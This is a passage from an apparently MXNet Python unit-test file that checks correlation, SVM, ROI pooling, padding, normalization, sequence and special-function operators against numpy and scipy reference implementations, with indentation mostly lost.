sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(), img1=img1.shape, img2=img2.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
    msg = npt.build_err_msg([a, b],
                            err_msg="Inferred type from a is not as expected, "
                                    "Expected :%s %s %s, Got: %s %s %s"
                                    % (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
                            names=['a', 'b'])
    raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
    msg = npt.build_err_msg([a, b],
                            err_msg="Inferred type from b is not as expected, "
                                    "Expected :%s %s %s, Got: %s %s %s"
                                    % (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
                            names=['a', 'b'])
    raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad)
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad)
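# Both SVM tests above verify the hinge-loss gradients w.r.t. the scores x,
# with labels encoded as y in {-1, +1} via l_mask:
#   L1-SVM: d/dx max(0, 1 - y*x)   = -y   * 1[1 - y*x > 0]
#   L2-SVM: d/dx max(0, 1 - y*x)^2 = -2*y * max(0, 1 - y*x)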
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
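# Derivation sketch for data_grad above: with x_hat = (x - mean) / std and
# w = out_grad * gamma / std, differentiating through the per-axis mean and
# variance gives
#   dx = w - mean(w) - x_hat * mean(w * x_hat),
# which is exactly the expression computed for data_grad.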
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
                            npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
                            npy_out_backward = np.sign(in_data) if order == 1 else in_data / npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
def test_layer_norm():
for enforce_safe_acc in ["1", "0"]:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for dtype, forward_check_eps, backward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4],
[1E-2, 1E-3, 1E-4]):
if dtype != np.float16:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]
else:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10)], [True, True] # large input + fp16 does not pass the forward check
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
                        # the numpy reference-gradient check is only stable in fp32/fp64
                        npy_grad_check = dtype != np.float16
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
    except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
